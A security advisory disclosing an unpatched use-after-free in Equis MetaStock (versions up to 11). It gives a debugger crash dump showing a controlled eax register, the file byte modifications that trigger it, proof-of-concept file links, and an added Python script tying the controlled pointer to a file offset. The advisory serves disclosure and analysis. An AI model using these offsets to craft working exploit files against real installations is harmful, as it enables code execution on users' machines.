#######################################################################
Luigi Auriemma
Application: Equis MetaStock
http://www.equis.com
Versions: <= 11
Platforms: Windows
Bug: use after free
Exploitation: file
Date: 06 Sep 2011
Author: Luigi Auriemma
e-mail: [email protected]
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
MetaStock is the most used and awarded software for performing
technical analysis of stocks, futures, forex, commodities, indices and
other financial instruments.
#######################################################################
======
2) Bug
======
All the file types supported by MetaStock (mwc/mws charts, mwt templates
and mwl layout) trigger a use-after-free vulnerability that is
exploitable through invalid and malformed files:
eax=41414141 ebx=73eccedd ecx=01028620 edx=00000004 esi=010283c0 edi=0012e748
eip=00486378 esp=0012deb0 ebp=0012e754 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
Mswin+0x86378:
00486378 ff5004 call dword ptr [eax+4] ds:0023:41414145=????????
Modified bytes:
0000308B 1E 40
00003214 74 41 ; eax 0x41414141 on Windows 2003 Server
00003215 69 41
00003216 76 41
00003217 65 41
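
The crash state above can be triaged mechanically. The following is an added example, not part of the original advisory: it parses the register dump and the modified-bytes table from this page, recomputes the address the faulting call reads its target from, and reports which file offset supplies the register value. The function names are hypothetical, and the table columns are assumed to be offset, original byte, modified byte.

```python
import re

# Crash state and byte diff copied from the advisory text above.
DUMP = """\
eax=41414141 ebx=73eccedd ecx=01028620 edx=00000004 esi=010283c0 edi=0012e748
eip=00486378 esp=0012deb0 ebp=0012e754 iopl=0 nv up ei pl nz na po nc
00486378 ff5004 call dword ptr [eax+4] ds:0023:41414145=????????
"""
DIFF = """\
0000308B 1E 40
00003214 74 41 ; eax 0x41414141 on Windows 2003 Server
00003215 69 41
00003216 76 41
00003217 65 41
"""

def parse_registers(dump):
    """Return {register: value} for every reg=hex pair in the dump."""
    return {n: int(v, 16) for n, v in re.findall(r"\b(e[a-z]{2})=([0-9a-f]{8})\b", dump)}

def parse_diff(text):
    """Return {file_offset: (original_byte, modified_byte)} (assumed column order)."""
    rows = (line.split(";")[0].split() for line in text.splitlines() if line.strip())
    return {int(o, 16): (int(a, 16), int(b, 16)) for o, a, b in rows}

def indirect_call_target(dump, regs):
    """Decode 'call dword ptr [reg+disp]'; return (reg, pointer address, readable)."""
    m = re.search(r"call\s+dword ptr \[(e[a-z]{2})\+([0-9a-f]+)\]\s+\S+:([0-9a-f]{8})=(\S+)", dump)
    reg, disp, shown = m.group(1), int(m.group(2), 16), int(m.group(3), 16)
    addr = (regs[reg] + disp) & 0xFFFFFFFF
    if addr != shown:
        raise ValueError("debugger operand address disagrees with register state")
    # WinDbg prints '?' for each byte it cannot read at the operand address.
    return reg, addr, "?" not in m.group(4)

def modified_dwords(diff):
    """Return (offset, little-endian value) for each run of 4 consecutive modified bytes."""
    return [(o, int.from_bytes(bytes(diff[o + k][1] for k in range(4)), "little"))
            for o in sorted(diff) if all(o + k in diff for k in range(4))]

def triage(dump, diff_text):
    """Tie the register used by the faulting call back to bytes in the input file."""
    regs = parse_registers(dump)
    reg, addr, readable = indirect_call_target(dump, regs)
    hits = [off for off, val in modified_dwords(parse_diff(diff_text)) if val == regs[reg]]
    return {"register": reg, "pointer_addr": addr, "readable": readable,
            "file_offset": hits[0] if hits else None}
```

For this page's data, triage(DUMP, DIFF) ties eax to the four bytes at file offset 0x3214, which is the signal that the call target is taken from file content rather than from a valid object.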
#######################################################################
===========
3) The Code
===========
http://aluigi.org/poc/metastock_1.mwl
http://www.exploit-db.com/sploits/17836.mwl
#######################################################################
======
4) Fix
======
No fix.
#######################################################################